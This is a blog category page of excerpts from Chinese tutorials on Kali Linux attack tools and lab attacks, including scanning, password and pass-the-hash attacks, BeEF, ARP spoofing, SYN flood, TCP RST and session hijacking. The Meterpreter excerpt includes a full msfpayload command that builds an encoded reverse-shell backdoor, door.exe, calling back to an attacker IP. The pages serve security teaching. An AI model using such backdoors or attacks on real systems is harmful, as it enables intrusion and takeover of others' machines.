网络攻防
文章平均质量分 55
the__apollo
水滴石穿,不舍昼夜
展开
-
网络攻防之——常用网络扫描工具
netenum工具:一个很好用的IP段生成工具。可以用来查看有哪些主机在线(这个工具的第二个功能的查询结果不是特别准确,所以它的主要功能还是用来生成IP列表)。使用截图如下 fping工具:常用格式:fping -g 123.58.180.0/24,用来进行IP段扫描,使用示例如下图 nbtscan 工具:作用,扫描内网,使用示例如下图 ARPing工具:探测MAC地址(借助ARP协议) N原创 2017-03-18 20:50:42 · 17367 阅读 · 0 评论 -
网络攻防之——数据库评估
BBQSqlBBQSql是一个Python编写的盲注工具,当检测可以的注入漏洞时会很有用。它还是一个半自动工具(需要手动设置一些参数),允许客户自定义参数 DBPwAudit数据库用户名密码枚举工具命令语法如下破解SQLServer 数据库、 ./dbpwaudit -s IP -d master(数据库名) -D mssql(数据库类型) -U username(字典) -P password原创 2017-04-05 14:32:37 · 1815 阅读 · 0 评论 -
网络攻防之——web应用代理
通过应用代理工具分析数据包,或修改数据包重放,暴力攻击等在web安全测试中经常用到 burpsuiteBurp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。 proxy是代理。在option中,显示了代理监听是127.0.0.1,监听8080端口。如果我们将浏览器设置成127.0.0.1,端口号设置成8080,原创 2017-04-05 14:37:10 · 1043 阅读 · 0 评论 -
网络攻防之——BurpSuite的使用
burpsuite的介绍:burpsuite是一个web应用程序集成攻击平台,它包含了一系列burp工具,这些工具之间有大量接口可以互相通信,目的是为了促进和提高整个攻击的效率。平台中所有工具共享同一robust框架,以便统一处理HTTP请求,持久性,认证,上游代理,日志记录,报警和可扩展性。burpsuite允许攻击者结合手工和自动技术去枚举,分析,攻击web应用程序,这些不同的burp工具通过协原创 2017-04-05 14:40:54 · 2668 阅读 · 0 评论 -
网络攻防之——Fuzz工具
FUzz是一个模糊测试工具模糊测试是漏洞挖掘过程中重要的一步bed.plBed是一个纯文本协议的Fuzz工具,能够检查常见的漏洞,如缓冲区溢出,格式串漏洞,整数溢出等。Fuzz_ipv6这是THC出品的针对IPV6协议的模糊测试工具0hrwurm这是一个迷你的对RTP的fuzz工具,主要针对SIP通信的fuzzpowerfuzzer是一个有图形化界面的工具, burpsuite等web代理工具原创 2017-04-05 14:45:37 · 19798 阅读 · 1 评论 -
kali密码攻击之——在线攻击工具
密码攻击是安全测试中必不可少的一环,下图为kali对在线密码攻击的工具的分类 Cewl该工具可以通过爬行网站获取关键信息创建一个密码字典。例如输入一个url,它通过提取返回这个url页面源码标签中的一些内容,把这些内容组合成字典,对管理员密码的一个特定枚举就更高效一些。 CAT(Cisco-Auditing-Tool思科审计工具)一个很小的安全审计工具,扫描思科路由器的一般性漏洞,例如默认密码,原创 2017-04-22 19:57:35 · 18224 阅读 · 0 评论 -
kali密码攻击之——哈希传递攻击
passing the hash,中文一般翻译为hash传递攻击,在windows系统中,系统通常不会存储用户登录密码,而是存储密码的哈希值,在我们远程登录系统的时候,实际上向远程传递的就是密码的hash值。当攻击者获取了存储在计算机上的用户名和密码的hash值的时候,他虽然不知道密码值,但是仍然可以通过直接连接远程主机,通过传送密码的hash值来达到登录的目的。passing the hash套件原创 2017-04-22 20:10:51 · 7275 阅读 · 1 评论 -
kali无线安全分析工具
随着无线网络的兴起,kali Linux下为我们准备了丰富的无线网络攻击套件。由于无线网络攻击测试需要硬件设备支持,故对这些工具我们只在理论上加以介绍。 RFID/NPC工具与之相关的是IC卡的攻击与破解,生活中形形色色的饭卡,工卡,房卡,水卡都可以成为攻击测试的目标。有时需要一套专业的分析硬件如Proxmark3,详细的介绍请参考国内的无线网络安全团队的RADIOWAR的WIKI。软件定义无线原创 2017-04-22 20:15:58 · 3428 阅读 · 0 评论 -
kali漏洞利用之Metasploit实战
Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启动服务:在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录 2.路径介绍kali中,原创 2017-04-22 20:33:16 · 22030 阅读 · 0 评论 -
kali漏洞利用之Meterpreter介绍
使用示例:1.生成Meterpreter后门命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe 这个语句中,如果不知道参数是什么,可以在metas原创 2017-04-22 20:40:15 · 3851 阅读 · 0 评论 -
kali漏洞利用之BeeF
对XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,Beef是一款丝毫不逊于XSS平台的工具。Beef是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具。打开beefbeef-xss 默认用户名和密码分别为beef/beef 假设被测试主机由于XSS漏洞请求到下面这个页面 这时候可以看到,online browsers就多了一项127.0.0.1原创 2017-04-22 20:50:23 · 5838 阅读 · 2 评论 -
网络攻防之——wireshark的使用
首先是wireshark的界面,在interface list 中选取etho这块网卡,点击Start,即可开始抓包。 从左向右,第一列是编号,第二列是抓包的时间。第三列是所抓报文的源,源地址若是二层报文,则显示的是MAC地址,如果是三层以上的报文,会显示一个IP地址。第四列是目标,同第三列相同,要么是目标MAC,要么是目标IP。第五列是报文的协议。最后一列是关于报文信息的描述。我们随便点原创 2017-03-26 20:06:59 · 2334 阅读 · 0 评论 -
网络攻防之——WEB漏洞扫描
cadaver这个工具是一个用来浏览和修改WebDAV共享的Unix命令行程序。这种工具就是以一种客户端,命令行的格式链接webdavDAVtest测试对支持WebDAV的服务器上传文件等语法:davtest -url http://222.28.136.226/dav/deblaze针对FLASH远程调用等的枚举,一般在xss或者较深入的web安全中可能会用到Fimap文件包含漏洞利用工具Grab原创 2017-03-26 20:01:53 · 6828 阅读 · 0 评论 -
网络攻防之——nmap工具的使用
nmap简介:nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全。它的一些基本用法如下:nmap + IP地址 功能为探测目标主机在1—10000范围内所开放的端口,使用示例如下图: nmap -vv +IP地址 对扫描结果进行详细输出,如下图: nmap -原创 2017-03-18 21:00:57 · 1702 阅读 · 1 评论 -
网络攻防之——指纹识别工具
banner抓取:最基础,最简单的指纹识别。例如一个网站,下面写着powered by discuzl,说明这个网站使用discuzl制作的。如果一个网站使用的是php,则它通常会在banner上加上php和一个版本号。命令使用如下 curl用来爬取网站,-I是指只抓取返回的http协议的header头常规主动指纹识别的工具Nmap,相关操作之前有介绍了,这里有一个使用范例 被动指纹识别工具原创 2017-03-18 21:06:22 · 5986 阅读 · 0 评论 -
网络攻防之——协议分析
在完成主机探测与扫描,并对主机指纹进行探测分析后,可能还要涉及到对具体服务的具体分析,下面就是kali当中整合的协议分析工具 现就其中的几个典型工具做介绍。SMB工具的acccheck 尝试创建IPC链接和admin链接,如果能成功的创立链接,就代表猜到了用户名和密码。它还可使用用户名密码字典枚举尝试与目标IP/IP列表进行IPC与admin链接SMTP分析工具smtp-user-原创 2017-03-18 21:11:27 · 1175 阅读 · 0 评论 -
ARP缓存欺骗攻击
首先准备三台实验用虚拟机,分别是A:kali(攻击机),B:Metasploitable—ubuntu(一号靶机,作为FTP服务器),C:Metasploitable—win2k(二号靶机,作为FTP服务器访问者)。 首先分别记录下A,B,C三台计算机的IP地址和MAC地址,分别为 A: B: C: 然后,我们用A主机,来pingB和C两台主机,目的是获取它们的ip和mac的对应关系,pi原创 2017-04-09 22:14:20 · 3925 阅读 · 1 评论 -
ICMP重定向攻击实验流程
首先查看靶机A的ip/mac地址,攻击机B的ip/mac地址 然后记录下此时A的路由表状态 我们打开wireshark,输入判断条件 (tcp or arp or icmp) and ip.addr == 222.28.136.122 准备待命抓包。 这时我们开启netwox进行ICMP路由重定向,使用第86号工具,按照工具提示进行数据包的篡改,如下图 这句话的意思是,嗅探网络中来自原创 2017-04-10 17:57:23 · 7455 阅读 · 1 评论 -
SYN Flood攻击实验流程
TCP SYN Flood,又称SYN洪泛攻击,是目前最为有效和流行的一种拒绝服务攻击形式。它利用TCP三次握手协议的缺陷,向目标主机发送大量的伪造源地址的SYN连接请求,消耗目标主机的连接队列资源,从而不能正常为用户提供服务。 首先,令A为攻击机(SYN Flood攻击发起者),C为靶机,B为C要去连接的服务器,先查看它们的IP地址,如下: 然后,我们先用C连接一下B的23端口: 可以看原创 2017-04-10 18:31:55 · 13570 阅读 · 1 评论 -
SYN Flood攻击实验流程
TCP SYN Flood,又称SYN洪泛攻击,是目前最为有效和流行的一种拒绝服务攻击形式。它利用TCP三次握手协议的缺陷,向目标主机发送大量的伪造源地址的SYN连接请求,消耗目标主机的连接队列资源,从而不能正常为用户提供服务。 首先,令A为攻击机(SYN Flood攻击发起者),C为靶机,B为C要去连接的服务器,先查看它们的IP地址,如下: 然后,我们先用C连接一下B的23端口: 可以看原创 2017-04-10 18:31:59 · 1622 阅读 · 0 评论 -
TCP RST攻击实验流程
TCP RST攻击也称伪造TCP重置报文攻击,它通过更改TCP协议头的标志位中的“reset”比特位(0变1),来关闭掉一个TCP会话连接。 首先,A为kali攻击机,B为靶机(win2000),C为服务器(ubuntu)。其中服务器的IP地址如下 我们用靶机B建立和C的23端口的连接,利用telnet命令 这时,我们启动A中的wireshark,进行数据包的监视: 打开NETWOX,调原创 2017-04-10 18:57:17 · 6572 阅读 · 0 评论 -
基于hunt工具的TCP会话劫持攻击实验
TCP会话劫持攻击,是劫持通信双方已建立的TCP会话连接,假冒其中一方的身份与另一方进行进一步通信。通常一些网络服务会建立在TCP会话之后进行应用层的身份认证,客户端在通过身份认证之后,就可以通过TCP会话连接对服务器索取资源。且期间不用再次进行身份认证。而TCP会话劫持为 攻击者提供了一种绕过应用层身份认证的技术途径,因此得到较高水平攻击者的青睐。实验环境: A:攻击机kali B:TCP会话原创 2017-04-10 21:24:03 · 9715 阅读 · 8 评论 -
网络攻防之——openvas的使用
首先先确定靶机可以ping通,然后在openvas界面中添加一个新的目标,点击new target,如下 在name和manual里面输入目标主机的IP地址,其他保持默认即可。创建完成后会在target当中显示如下 创建好目标了,下一步就是新建扫描任务,点击Scan Management——New Task,随意起一个名字,然后IP地址是正确的即可,其他均默认 主界面显示ok原创 2017-03-26 19:45:14 · 1706 阅读 · 0 评论 -
网络攻防之——kali中的其他扫描工具
Golismerogolismero含有多种插件,输入如下命令可以查看插件列表 使用scan命令扫描靶机,如下 Nikto.plNikto是一款开源的网页服务扫描器,它可以对网页服务进行多种扫描。用如下命令可以扫描靶机 扫描出的漏洞信息如下 Lynis系统信息收集整理工具这个工具是对Linux详细配置等信息进行枚举收集,生成易懂的报告文件,使用如下 为了避免交互,可以在末尾添加原创 2017-03-26 19:57:15 · 26308 阅读 · 2 评论 -
计算机网络的三种通讯模式(单播,广播,组播)小结
1.单播(Unicast)单播在发送者和每一接收者之间实现点对点网络连接。 如果一台发送者同时给多个的接收者传输相同的数据,也必须相应的复制多份的相同数据包。如果有大量主机希望获得数据包的同一份拷贝时, 将导致发送者负担沉重、延迟长、网络拥塞;为保证一定的服务质量需增加硬件和带宽。“单播”可以理解为一个人对另外一个人说话,,此时信息的接收和传递只在两个节点之间进行,参见图1。 单播...转载 2018-03-04 13:18:07 · 709 阅读 · 0 评论